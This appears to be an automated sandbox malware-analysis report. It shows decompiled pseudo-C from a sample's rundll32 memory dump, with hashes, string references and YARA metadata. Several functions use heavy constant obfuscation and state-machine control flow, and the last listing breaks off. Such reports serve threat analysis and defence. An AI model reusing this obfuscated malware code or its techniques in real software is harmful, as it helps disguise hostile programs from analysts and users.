Yara matches

Similarity

API ID:
String ID: !"$/K$8}$[O$gl$n/u7$q)7$q)7$yY
API String ID: 0-4086401284
Opcode ID: da27bf6bb47f9f0d8f846ad5b49cb959e02cfe5f63d9f5e22073504c5b357da0
Instruction ID: c8ee9e000a28c951ba2c104bf383832857a52a8443078db754019dc9b0f5d5ce
Opcode Fuzzy Hash: da27bf6bb47f9f0d8f846ad5b49cb959e02cfe5f63d9f5e22073504c5b357da0
Instruction Fuzzy Hash: 848173B15093019FE358CF25C58992BBBE0FBC8B08F50891DF59A96260D7B5DA48CF87

Uniqueness

Uniqueness Score: -1.00%

Function 10017F79, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10017F79(short _a4, intOrPtr _a8) {
				short _t13;
				short _t28;

				_t28 = _a4;
				if(_t28 != 0 &&  *_t28 != 0 && E1001721E(_t28, ?str?) != 0) {
					if(E1001721E(_t28, ?str?) != 0) {
						return E1001B24C(_t28);
					}
					if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_a4, 2) == 0) {
						L9:
						return 0;
					}
					return _a4;
				}
				if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_a4, 2) == 0) {
					goto L9;
				}
				_t13 = _a4;
				if(_t13 == 0) {
					return GetACP();
				}
				return _t13;
			}

0x10017f7d
0x10017f82
0x10017faa
0x00000000
0x10017fd3
0x10017fc5
0x10017ff1
0x00000000
0x10017ff1
0x00000000
0x10017fc7
0x10017fef
0x00000000
0x00000000
0x10017ff5
0x10017ffa
0x10017ffe
0x10017ffe
0x10017fcc

APIs

_wcscmp.LIBCMT ref: 10017F90
_wcscmp.LIBCMT ref: 10017FA1
GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,100181D5,?,00000000), ref: 10017FBD
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,100181D5,?,00000000), ref: 10017FE7

Strings

OCP, xrefs: 10017F9B
ACP, xrefs: 10017F8A

Memory Dump Source

Source File: 00000007.00000002.2144561604.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2144552179.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144633674.000000001001D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2144648856.0000000010026000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2144655977.000000001002A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: InfoLocale_wcscmp
String ID: ACP$OCP
API String ID: 1351282208-711371036
Opcode ID: 39a9146c004a1db103ddb4810c4ee96cf5d5ee33b8bc0f9cc300c25d49d75d8f
Instruction ID: 26ed97d2faa079c665cb72fb69809b5c3a6d1a0e4d8f85ec2981535eb1650f33
Opcode Fuzzy Hash: 39a9146c004a1db103ddb4810c4ee96cf5d5ee33b8bc0f9cc300c25d49d75d8f
Instruction Fuzzy Hash: 9B01003660911ABAE711EE54DC45FDB37E8FB056E5B11842AF90CDF051E730EAC28790

Uniqueness

Uniqueness Score: -1.00%

Function 001A628A, Relevance: 10.3, Strings: 8, Instructions: 326
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E001A628A() {
				char _v524;
				signed int _v528;
				intOrPtr _v532;
				signed int _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				char _v572;
				intOrPtr _v576;
				char _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _v704;
				intOrPtr _t363;
				void* _t364;
				signed int _t367;
				void* _t370;
				char _t377;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				void* _t427;

				_v528 = _v528 & 0x00000000;
				_v532 = 0x62c78e;
				_t370 = 0x3784a33e;
				_v680 = 0xa975;
				_v680 = _v680 + 0xa87a;
				_v680 = _v680 + 0xffff62c2;
				_t414 = 0x2c;
				_v680 = _v680 / _t414;
				_v680 = _v680 ^ 0x0000041a;
				_t413 = 0;
				_v620 = 0x1834;
				_v620 = _v620 + 0xf82c;
				_t415 = 0x65;
				_v620 = _v620 * 0x72;
				_v620 = _v620 ^ 0x00794bc0;
				_v616 = 0x747d;
				_v616 = _v616 + 0x93e7;
				_v616 = _v616 << 0xf;
				_v616 = _v616 ^ 0x8432188a;
				_v656 = 0xb03a;
				_v656 = _v656 * 0x2f;
				_v656 = _v656 | 0x7f0ecf73;
				_v656 = _v656 ^ 0x7f2e9336;
				_v672 = 0xacda;
				_v672 = _v672 + 0xffff8919;
				_v672 = _v672 + 0xcfe2;
				_v672 = _v672 + 0xc9b1;
				_v672 = _v672 ^ 0x000193cc;
				_v636 = 0xec80;
				_v636 = _v636 / _t415;
				_v636 = _v636 << 4;
				_v636 = _v636 ^ 0x0000354a;
				_v640 = 0x3592;
				_v640 = _v640 << 2;
				_t416 = 0x22;
				_v640 = _v640 / _t416;
				_v640 = _v640 ^ 0x00001dae;
				_v684 = 0xa281;
				_v684 = _v684 >> 8;
				_v684 = _v684 | 0xe35d410d;
				_v684 = _v684 + 0xffff6f2e;
				_v684 = _v684 ^ 0xe35cf9bd;
				_v596 = 0x2ec4;
				_v596 = _v596 + 0xffff3adf;
				_v596 = _v596 ^ 0xffff2754;
				_v628 = 0xc12e;
				_v628 = _v628 ^ 0xbda20c33;
				_v628 = _v628 | 0x3478372d;
				_v628 = _v628 ^ 0xbdfae7ec;
				_v668 = 0x1a5d;
				_v668 = _v668 + 0xffff684c;
				_v668 = _v668 + 0x8558;
				_t417 = 0x63;
				_v668 = _v668 / _t417;
				_v668 = _v668 ^ 0x00001217;
				_v676 = 0xaa1a;
				_t418 = 0x78;
				_v676 = _v676 / _t418;
				_v676 = _v676 | 0xe7d7f5c6;
				_v676 = _v676 + 0xffff1566;
				_v676 = _v676 ^ 0xe7d702bd;
				_v648 = 0x1a15;
				_v648 = _v648 + 0xfffff5bd;
				_v648 = _v648 ^ 0x6693c3d8;
				_v648 = _v648 ^ 0x6693bd10;
				_v584 = 0x6666;
				_v584 = _v584 << 0xc;
				_v584 = _v584 ^ 0x06666ad7;
				_v652 = 0x66ca;
				_v652 = _v652 | 0xb23f766e;
				_v652 = _v652 + 0xba84;
				_v652 = _v652 ^ 0xb2404345;
				_v688 = 0xcf95;
				_v688 = _v688 >> 6;
				_v688 = _v688 >> 2;
				_v688 = _v688 << 0xa;
				_v688 = _v688 ^ 0x00034b7d;
				_v600 = 0xc62d;
				_v600 = _v600 + 0xd94d;
				_v600 = _v600 ^ 0x000191ed;
				_v612 = 0xa6a3;
				_v612 = _v612 | 0x2603b672;
				_v612 = _v612 << 0xb;
				_v612 = _v612 ^ 0x1db7977e;
				_v644 = 0x4dd3;
				_t419 = 0x7f;
				_v644 = _v644 / _t419;
				_v644 = _v644 + 0xffff74a8;
				_v644 = _v644 ^ 0xffff48e7;
				_v664 = 0xa993;
				_t420 = 0x13;
				_v664 = _v664 / _t420;
				_v664 = _v664 + 0xabe6;
				_v664 = _v664 ^ 0x0000cd02;
				_v696 = 0xcbb9;
				_v696 = _v696 << 6;
				_t421 = 0x6a;
				_v696 = _v696 / _t421;
				_t422 = 0x7b;
				_v696 = _v696 / _t422;
				_v696 = _v696 ^ 0x000019cb;
				_v632 = 0xaddd;
				_v632 = _v632 + 0x118c;
				_v632 = _v632 + 0x951d;
				_v632 = _v632 ^ 0x00012ff7;
				_v692 = 0x30f5;
				_v692 = _v692 ^ 0xc1bf2a85;
				_t423 = 0x44;
				_v692 = _v692 / _t423;
				_v692 = _v692 ^ 0x82e02cbd;
				_v692 = _v692 ^ 0x8039685f;
				_v624 = 0x64f0;
				_v624 = _v624 >> 7;
				_v624 = _v624 * 0x5e;
				_v624 = _v624 ^ 0x00002803;
				_v700 = 0xafbe;
				_v700 = _v700 << 1;
				_t424 = 0x46;
				_v700 = _v700 * 0x6e;
				_v700 = _v700 | 0x95531f7e;
				_v700 = _v700 ^ 0x95d774a9;
				_v704 = 0x40c0;
				_v704 = _v704 >> 2;
				_v704 = _v704 + 0xa491;
				_v704 = _v704 + 0xffff61f8;
				_v704 = _v704 ^ 0x00000a06;
				_v660 = 0x38fb;
				_v660 = _v660 | 0x170c0b2f;
				_v660 = _v660 >> 0xc;
				_v660 = _v660 ^ 0x48339c92;
				_v660 = _v660 ^ 0x483283a0;
				_v604 = 0xd60e;
				_v604 = _v604 | 0x6ee599be;
				_v604 = _v604 ^ 0x6ee5a95e;
				_v592 = 0xde69;
				_t369 = _v604;
				_v592 = _v592 * 0x2b;
				_v592 = _v592 ^ 0x00254352;
				_v588 = 0xc199;
				_v588 = _v588 + 0xffff6a5f;
				_v588 = _v588 ^ 0x00000dae;
				_v608 = 0x7a02;
				_v608 = _v608 | 0xd6069959;
				_v608 = _v608 / _t424;
				_v608 = _v608 ^ 0x030eba71;
				while(_t370 != 0x7634a66) {
					if(_t370 == 0x23a0a261) {
						_push(_v684);
						_push(_v640);
						E001AEC82(__eflags, E001A5EBA(_v636, 0x1001f800, __eflags), _v596, _v628, _v668, _v676,  *0x10020724 + 0x238,  &_v524);
						_t427 = _t427 + 0x24;
						E001AED35(_v648, _t356, _v584, _v652);
						_t370 = 0x3b17a01c;
						continue;
					} else {
						if(_t370 == 0x336f2ef5) {
							_v580 = _v580 - E001AD155(_t370);
							_t370 = 0x23a0a261;
							asm("sbb [esp+0x94], edx");
							continue;
						} else {
							if(_t370 == 0x3384a220) {
								_t377 = _v580;
								_t363 = _v576;
								_v540 = _v540 & 0x00000000;
								_v572 = _t377;
								_v564 = _t377;
								_v556 = _t377;
								_v548 = _t377;
								_v568 = _t363;
								_v560 = _t363;
								_v552 = _t363;
								_v544 = _t363;
								_t364 = E001A88A3(_t369,  &_v572, _v692, _t377, _t377, _v624, _v700, _v704);
								_t427 = _t427 + 0x18;
								__eflags = _t364;
								_t413 =  !=  ? 1 : _t413;
								_t370 = 0x7634a66;
								continue;
							} else {
								if(_t370 == 0x36a7c70f) {
									E001BBB1A(_v616,  &_v580, _v656, _v672);
									_t370 = 0x336f2ef5;
									continue;
								} else {
									if(_t370 == 0x3784a33e) {
										_t370 = 0x36a7c70f;
										continue;
									} else {
										if(_t370 != 0x3b17a01c) {
											L16:
											__eflags = _t370 - 0x28eb5b6;
											if(__eflags != 0) {
												continue;
											}
										} else {
											_t367 = E001B7809(_v688, 0, _v600, _v608, _v612, _t370, _v644, _v664, _v696, _v680, _t370,  &_v524, _v620, _v632);
											_t369 = _t367;
											_t427 = _t427 + 0x30;
											if(_t367 != 0xffffffff) {
												_t370 = 0x3384a220;
												continue;
											}
										}
									}
								}
							}
						}
					}
					return _t413;
				}
				E001B01E5(_v660, _v592, _t369, _v588);
				_t427 = _t427 + 0xc;
				_t370 = 0x28eb5b6;
				goto L16;
			}

0x001a6290
0x001a629a
0x001a62a5
0x001a62aa
0x001a62b2
0x001a62ba
0x001a62cc
0x001a62d1
0x001a62d7
0x001a62df
0x001a62e1
0x001a62e9
0x001a62f6
0x001a62f9
0x001a62fd
0x001a6305
0x001a630d
0x001a6315
0x001a631a
0x001a6322
0x001a632f
0x001a6333
0x001a633b
0x001a6343
0x001a634b
0x001a6353
0x001a635b
0x001a6363
0x001a636b
0x001a637b
0x001a637f
0x001a6384
0x001a638c
0x001a6394
0x001a639d
0x001a63a2
0x001a63a8
0x001a63b0
0x001a63b8
0x001a63bd
0x001a63c5
0x001a63cd
0x001a63d5
0x001a63e0
0x001a63eb
0x001a63f6
0x001a63fe
0x001a6406
0x001a640e
0x001a6416
0x001a641e
0x001a6426
0x001a6432
0x001a6437
0x001a643b
0x001a6445
0x001a6451
0x001a6456
0x001a645c
0x001a6464
0x001a646c
0x001a6474
0x001a647c
0x001a6484
0x001a648c
0x001a6494
0x001a649f
0x001a64a7
0x001a64b2
0x001a64ba
0x001a64c2
0x001a64ca
0x001a64d2
0x001a64da
0x001a64df
0x001a64e4
0x001a64e9
0x001a64f1
0x001a64fc
0x001a6507
0x001a6512
0x001a651a
0x001a6522
0x001a6527
0x001a652f
0x001a653b
0x001a6540
0x001a6546
0x001a654e
0x001a6556
0x001a6562
0x001a6567
0x001a656d
0x001a657d
0x001a6585
0x001a658d
0x001a6596
0x001a659b
0x001a65a5
0x001a65aa
0x001a65b0
0x001a65b8
0x001a65c0
0x001a65c8
0x001a65d0
0x001a65d8
0x001a65e0
0x001a65ec
0x001a65ef
0x001a65f3
0x001a65fb
0x001a6603
0x001a660b
0x001a6615
0x001a661b
0x001a6628
0x001a6630
0x001a663b
0x001a663c
0x001a6640
0x001a6648
0x001a6650
0x001a6658
0x001a665d
0x001a6665
0x001a666d
0x001a6675
0x001a667d
0x001a6685
0x001a668a
0x001a6692
0x001a669a
0x001a66a2
0x001a66aa
0x001a66b2
0x001a66c5
0x001a66c9
0x001a66d0
0x001a66db
0x001a66e6
0x001a66f1
0x001a66fc
0x001a6704
0x001a6712
0x001a6716
0x001a671e
0x001a6730
0x001a688b
0x001a6894
0x001a68d0
0x001a68d5
0x001a68e9
0x001a68f0
0x00000000
0x001a6736
0x001a673c
0x001a6873
0x001a687a
0x001a687f
0x00000000
0x001a6742
0x001a6744
0x001a67ef
0x001a6801
0x001a680c
0x001a681a
0x001a6821
0x001a6828
0x001a682f
0x001a6838
0x001a683f
0x001a6846
0x001a684d
0x001a6854
0x001a685b
0x001a685f
0x001a6861
0x001a6864
0x00000000
0x001a674a
0x001a6750
0x001a67da
0x001a67e1
0x00000000
0x001a6752
0x001a6758
0x001a67bd
0x00000000
0x001a675a
0x001a6760
0x001a6921
0x001a6921
0x001a6927
0x00000000
0x00000000
0x001a6766
0x001a67a3
0x001a67a8
0x001a67aa
0x001a67b0
0x001a67b6
0x00000000
0x001a67b6
0x001a67b0
0x001a6760
0x001a6758
0x001a6750
0x001a6744
0x001a673c
0x001a6939
0x001a6939
0x001a6914
0x001a6919
0x001a691c
0x00000000

Strings

ar-KW, xrefs: 001A68AB, 001A68B5, 001A68C9
A], xrefs: 001A63BD
ff, xrefs: 001A6494
-7x4, xrefs: 001A6406
J5, xrefs: 001A6384
ur phone might have stopped ringing before the call was answered or your modem might already be sending or receiving a fax., xrefs: 001A691C, 001A6921
RC%, xrefs: 001A66D0
}t, xrefs: 001A6305

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: A]$-7x4$J5$RC%$ar-KW$ff$ur phone might have stopped ringing before the call was answered or your modem might already be sending or receiving a fax.$}t
API String ID: 0-4100049197
Opcode ID: 70897e2c52def25ee0e7a2d05c9cc49397bfda7ff398b687e1ef0ba59af6c50d
Instruction ID: e9d2ae595fbb2f7d45f60f00e1595671be8b7f264c9bd574b4ebd74b81a7a1bf
Opcode Fuzzy Hash: 70897e2c52def25ee0e7a2d05c9cc49397bfda7ff398b687e1ef0ba59af6c50d
Instruction Fuzzy Hash: F5F124715093809FE368CF65C98964BFBE2FBC5758F108A1DF199862A0D7B98918CF43

Uniqueness

Uniqueness Score: -1.00%

Function 001AEF04, Relevance: 10.2, Strings: 8, Instructions: 249
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E001AEF04() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				signed int _v568;
				signed int _v572;
				intOrPtr _v576;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _t252;
				void* _t254;
				signed int _t256;
				void* _t258;
				signed int _t259;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t286;
				void* _t289;
				void* _t291;
				signed int* _t296;

				_t296 =  &_v684;
				_v576 = 0x5ac1ac;
				_t259 = 0;
				_v572 = 0;
				_v568 = 0;
				_v628 = 0x2293;
				_v628 = _v628 + 0x57c;
				_v628 = _v628 ^ 0xe383fa32;
				_v628 = _v628 ^ 0xe383d2bd;
				_v636 = 0xcb75;
				_v636 = _v636 | 0x941e90a9;
				_v636 = _v636 << 0xf;
				_v636 = _v636 ^ 0x6dfe8001;
				_v664 = 0xe67b;
				_v664 = _v664 >> 0xe;
				_v664 = _v664 | 0xc1c3c44d;
				_v664 = _v664 >> 7;
				_v664 = _v664 ^ 0x0183e919;
				_v600 = 0xc7ec;
				_v600 = _v600 + 0xffff53ee;
				_v600 = _v600 ^ 0x00007ae5;
				_v680 = 0x7a6d;
				_v680 = _v680 << 0xa;
				_v680 = _v680 + 0xc175;
				_v680 = _v680 * 0x7f;
				_t289 = 0x32525f80;
				_v680 = _v680 ^ 0xf350284b;
				_v632 = 0x5d09;
				_v632 = _v632 + 0x7e11;
				_v632 = _v632 << 0xc;
				_v632 = _v632 ^ 0x0db1d32b;
				_v652 = 0xdd4b;
				_t261 = 0x47;
				_v652 = _v652 / _t261;
				_v652 = _v652 + 0xfbed;
				_v652 = _v652 >> 0xb;
				_v652 = _v652 ^ 0x00007f13;
				_v660 = 0x7e41;
				_t262 = 0x7f;
				_v660 = _v660 / _t262;
				_v660 = _v660 << 0xe;
				_v660 = _v660 | 0x1cacd9b9;
				_v660 = _v660 ^ 0x1cbffe4a;
				_v644 = 0xb20f;
				_v644 = _v644 << 0xf;
				_v644 = _v644 + 0xffff7dcd;
				_v644 = _v644 ^ 0x5906ced2;
				_v668 = 0x6654;
				_v668 = _v668 + 0xed27;
				_v668 = _v668 | 0x9a46a72a;
				_v668 = _v668 ^ 0x9616be33;
				_v668 = _v668 ^ 0x0c516c93;
				_v624 = 0x9c4e;
				_v624 = _v624 ^ 0x75d8b6b6;
				_v624 = _v624 ^ 0x75d808fe;
				_v616 = 0xe63;
				_v616 = _v616 + 0xffff6360;
				_v616 = _v616 ^ 0xffff0e42;
				_v684 = 0x64e6;
				_t263 = 0x51;
				_v684 = _v684 * 0xa;
				_v684 = _v684 ^ 0x1015d5c6;
				_v684 = _v684 << 0xf;
				_v684 = _v684 ^ 0x129d2ab9;
				_v608 = 0xb1bf;
				_v608 = _v608 / _t263;
				_v608 = _v608 ^ 0x000009d6;
				_v656 = 0x99ce;
				_v656 = _v656 + 0xffff7221;
				_t264 = 9;
				_t288 = _v624;
				_v656 = _v656 * 0x27;
				_v656 = _v656 ^ 0xaff140e9;
				_v656 = _v656 ^ 0xaff0fb08;
				_v672 = 0x29dd;
				_v672 = _v672 | 0xd5e3cd20;
				_v672 = _v672 << 0xa;
				_v672 = _v672 | 0x01f07225;
				_v672 = _v672 ^ 0x8ff7c65c;
				_v640 = 0xff5d;
				_v640 = _v640 << 0xe;
				_v640 = _v640 / _t264;
				_v640 = _v640 ^ 0x0717f5b7;
				_v620 = 0x829a;
				_v620 = _v620 ^ 0x528b6d9c;
				_v620 = _v620 ^ 0x528baa7a;
				_v612 = 0x6e6c;
				_v612 = _v612 | 0xed11f316;
				_v612 = _v612 ^ 0xed11ccce;
				_v676 = 0x502f;
				_t265 = 0x64;
				_v676 = _v676 * 0x3d;
				_v676 = _v676 / _t265;
				_v676 = _v676 >> 0xf;
				_v676 = _v676 ^ 0x00003cfe;
				_v596 = 0x471b;
				_v596 = _v596 >> 4;
				_v596 = _v596 ^ 0x00002859;
				_v592 = 0x311;
				_t266 = 0x66;
				_v592 = _v592 / _t266;
				_v592 = _v592 ^ 0x0000118e;
				_v604 = 0xfbca;
				_v604 = _v604 >> 0xb;
				_v604 = _v604 ^ 0x00000a30;
				_v648 = 0x16a5;
				_t267 = 0x39;
				_v648 = _v648 / _t267;
				_v648 = _v648 * 0x45;
				_v648 = _v648 ^ 0x00001b3a;
				do {
					while(_t289 != 0x940afdb) {
						if(_t289 == 0xd57e60e) {
							_t286 =  &_v588;
							E001BBB1A(_v596, _t286, _v592, _v604);
							_pop(_t267);
							_t289 = 0x1b246311;
							continue;
						} else {
							if(_t289 == 0x1b246311) {
								_t254 = E001AD155(_t267);
								_t291 = _v588 - _v548;
								asm("sbb ecx, [esp+0x9c]");
								__eflags = _v584 - _t286;
								if(__eflags >= 0) {
									if(__eflags > 0) {
										L20:
										_t259 = 1;
										__eflags = 1;
									} else {
										__eflags = _t291 - _t254;
										if(_t291 >= _t254) {
											goto L20;
										}
									}
								}
							} else {
								if(_t289 == 0x1c325579) {
									_t256 = E001B99C0(_v684,  &_v564, _v608, _t288, _t267, _t267, _v656, _v672);
									_t286 = _v620;
									asm("sbb esi, esi");
									_t267 = _v640;
									_t289 = ( ~_t256 & 0xd97e6c8b) + 0x33d97983;
									E001B01E5(_v640, _v612, _t288, _v676);
									_t296 =  &(_t296[9]);
									goto L15;
								} else {
									if(_t289 == 0x2aad24b3) {
										_t286 =  &_v524;
										_t267 = _v664;
										_t258 = E001AD194(_v664, _t286, __eflags, _v664, _v600, _v680);
										_t296 =  &(_t296[3]);
										__eflags = _t258;
										if(__eflags != 0) {
											_t289 = 0x940afdb;
											continue;
										}
									} else {
										if(_t289 != 0x32525f80) {
											goto L15;
										} else {
											_t289 = 0x2aad24b3;
											continue;
										}
									}
								}
							}
						}
						L21:
						return _t259;
					}
					_t286 = 0;
					_t252 = E001B7809(_v632, 0, _v652, _v648, _v660, _v632, _v644, _v668, _v624, _v636, _v632,  &_v524, _v628, _v616);
					_t288 = _t252;
					_t296 =  &(_t296[0xc]);
					__eflags = _t252 - 0xffffffff;
					if(__eflags == 0) {
						_t289 = 0x33d97983;
						goto L15;
					} else {
						_t289 = 0x1c325579;
						continue;
					}
					goto L21;
					L15:
					__eflags = _t289 - 0x33d97983;
				} while (__eflags != 0);
				goto L21;
			}

0x001aef04
0x001aef0e
0x001aef18
0x001aef1a
0x001aef21
0x001aef28
0x001aef30
0x001aef38
0x001aef40
0x001aef48
0x001aef50
0x001aef58
0x001aef5d
0x001aef65
0x001aef6d
0x001aef72
0x001aef7a
0x001aef7f
0x001aef87
0x001aef8f
0x001aef97
0x001aef9f
0x001aefa7
0x001aefac
0x001aefbb
0x001aefbf
0x001aefc4
0x001aefcc
0x001aefd4
0x001aefdc
0x001aefe1
0x001aefe9
0x001aeff5
0x001aeffa
0x001af000
0x001af008
0x001af00d
0x001af015
0x001af021
0x001af026
0x001af02a
0x001af02f
0x001af037
0x001af03f
0x001af047
0x001af04c
0x001af054
0x001af05c
0x001af064
0x001af06c
0x001af074
0x001af07c
0x001af084
0x001af08c
0x001af094
0x001af09c
0x001af0a4
0x001af0ac
0x001af0b4
0x001af0c1
0x001af0c2
0x001af0c6
0x001af0ce
0x001af0d3
0x001af0dd
0x001af0ed
0x001af0f3
0x001af100
0x001af108
0x001af115
0x001af118
0x001af11c
0x001af120
0x001af128
0x001af130
0x001af138
0x001af140
0x001af145
0x001af14d
0x001af155
0x001af15d
0x001af16a
0x001af16e
0x001af176
0x001af17e
0x001af186
0x001af18e
0x001af196
0x001af19e
0x001af1a6
0x001af1b3
0x001af1b6
0x001af1c2
0x001af1c6
0x001af1cb
0x001af1d3
0x001af1db
0x001af1e0
0x001af1e8
0x001af1f4
0x001af1f9
0x001af1ff
0x001af207
0x001af20f
0x001af214
0x001af21c
0x001af228
0x001af22b
0x001af234
0x001af238
0x001af240
0x001af240
0x001af252
0x001af2fe
0x001af30a
0x001af310
0x001af311
0x00000000
0x001af258
0x001af25e
0x001af374
0x001af37d
0x001af388
0x001af38f
0x001af391
0x001af393
0x001af399
0x001af39b
0x001af39b
0x001af395
0x001af395
0x001af397
0x00000000
0x00000000
0x001af397
0x001af393
0x001af264
0x001af26a
0x001af2cc
0x001af2de
0x001af2e2
0x001af2e4
0x001af2ee
0x001af2f0
0x001af2f5
0x00000000
0x001af26c
0x001af272
0x001af28b
0x001af297
0x001af29b
0x001af2a0
0x001af2a3
0x001af2a5
0x001af2ab
0x00000000
0x001af2ab
0x001af274
0x001af27a
0x00000000
0x001af280
0x001af280
0x00000000
0x001af280
0x001af27a
0x001af272
0x001af26a
0x001af25e
0x001af39f
0x001af3a8
0x001af3a8
0x001af326
0x001af34f
0x001af354
0x001af356
0x001af359
0x001af35c
0x001af368
0x00000000
0x001af35e
0x001af35e
0x00000000
0x001af35e
0x00000000
0x001af36a
0x001af36a
0x001af36a
0x00000000

Strings

', xrefs: 001AF064
ln, xrefs: 001AF18E
/P, xrefs: 001AF1A6
Y(, xrefs: 001AF1E0
0, xrefs: 001AF214
], xrefs: 001AEFCC
d, xrefs: 001AF0B4
A~, xrefs: 001AF015

Memory Dump Source

Source File: 00000007.00000002.2139903329.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000007.00000002.2139927690.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2139935189.00000000001C1000.00000020.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ]$'$/P$0$A~$Y($ln$d
API String ID: 0-2072632330
Opcode ID: 2f535771ce066a9ce697b385f8a4d02e7b25ac284282343d14c0b2fc36f48005
Instruction ID: c1737e82be8652b4b9ecc29760d0877af8e74ddf4f415df44698c9daf7b064ba
Opcode Fuzzy Hash: 2f535771ce066a9ce697b385f8a4d02e7b25ac284282343d14c0b2fc36f48005
Instruction Fuzzy Hash: F9C151769083819FE368CF65C58A54BFBF2BBC5708F004A1DF596962A0C3B99909CF43

Uniqueness

Uniqueness Score: -1.00%

Function 001B7D78, Relevance: 10.2, Strings: 8, Instructions: 200
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E001B7D78() {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _v104;
				signed int _v108;
				signed int _t182;
				intOrPtr _t184;
				intOrPtr _t185;
				intOrPtr _t186;
				signed int _t188;
				signed int _t189;
				void* _t208;
				char _t212;
				signed int* _t213;
				void* _t215;

				_t213 =  &_v108;
				_v16 = 0x3c8f5;
				_t186 = 0;
				_v12 = 0;
				_v8 = 0;
				_v100 = 0xc6b2;
				_v100 = _v100 + 0xffff78c0;
				_v100 = _v100 + 0x52d8;
				_v100 = _v100 >> 0x10;
				_v100 = _v100 ^ 0x00000005;
				_v72 = 0xab4;
				_v72 = _v72 ^ 0x77cfe995;
				_v72 = _v72 >> 2;
				_v72 = _v72 ^ 0x1df3b9dd;
				_v76 = 0xf8c4;
				_v76 = _v76 + 0xffffc449;
				_t188 = 0x25;
				_v76 = _v76 / _t188;
				_v76 = _v76 ^ 0x0000562a;
				_t208 = 0x72c744f;
				_v84 = 0x4617;
				_v84 = _v84 >> 7;
				_v84 = _v84 ^ 0xbaf475b9;
				_v84 = _v84 ^ 0xf0fbb922;
				_v84 = _v84 ^ 0x4a0fd9a7;
				_v88 = 0xf3c6;
				_v88 = _v88 + 0xffffab55;
				_v88 = _v88 + 0x3ba7;
				_v88 = _v88 >> 0x10;
				_v88 = _v88 ^ 0x00007f81;
				_v68 = 0x4aec;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 + 0xfffff976;
				_v68 = _v68 ^ 0xfffff341;
				_v48 = 0x175;
				_v48 = _v48 << 9;
				_v48 = _v48 ^ 0x0002c29d;
				_v60 = 0xa147;
				_v60 = _v60 >> 5;
				_v60 = _v60 ^ 0x00007dc4;
				_v104 = 0x1c00;
				_v104 = _v104 ^ 0x17ddf75c;
				_v104 = _v104 + 0x23f7;
				_v104 = _v104 + 0xb870;
				_v104 = _v104 ^ 0x17de90cf;
				_v80 = 0xd6e8;
				_v80 = _v80 ^ 0xb1aea3a2;
				_v80 = _v80 | 0x4c1ba216;
				_v80 = _v80 ^ 0xfdbfa62e;
				_v108 = 0xaa26;
				_v108 = _v108 << 7;
				_v108 = _v108 << 0xb;
				_v108 = _v108 << 0xd;
				_v108 = _v108 ^ 0x000055c6;
				_v52 = 0x4fd5;
				_t189 = 0x32;
				_v52 = _v52 / _t189;
				_v52 = _v52 ^ 0x00003e36;
				_v56 = 0xa2d9;
				_v56 = _v56 ^ 0x39caebbb;
